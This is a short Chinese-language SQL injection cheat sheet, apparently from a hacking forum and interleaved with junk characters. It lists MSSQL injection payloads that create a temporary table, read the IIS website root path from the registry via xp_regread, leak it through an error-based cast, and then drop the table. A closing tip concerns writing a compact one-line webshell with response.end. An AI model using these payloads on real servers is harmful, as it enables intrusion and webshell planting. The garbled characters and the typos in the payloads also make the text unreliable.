1、drop table [jm_tmp];create table [jm_tmp](value navrchar(4000) null,data nvarchar(4000) null)-- 创建表, q2 \4 d, X6 w. m, Y5 E
. F& M" i- d( a! x% h% ]6 Z, Y q2 k
2、 delete [jm_tmp];insert [jm_tmp] exec master.dbo.xp_regread ’HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots’,’/’-- 将网站目录插到表字段中" N7 w# z8 n f" K" a0 L6 _0 z
4 G) }1 w! f$ z. W0 {
/ w6 Z- i& H3 z- C0 u6 V 3、and (select top 1 cast([data] as nvarchar(4000) char(124) from [jm_tmp] order by [data] desc)=0 ’//暴出字段
+ v4 N4 S1 u. P1 O1 y8 b8 K \0 H/ s- ^ X0 N5 g+ p# f
7 P1 n N. | A 4、drop table [jm_tmp]-- 删除此表。0 a6 K# ^, m- ^0 P. Q" c
0 H. ?# i+ K8 N0 E
7 c0 n. V9 J( E5 A: q- t4 Y$ k) E
另附上备分专用一句话
# K8 S7 ^$ m0 T& u 加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.
d1 ?& k$ O* w2 M0 m9 ~0 @ |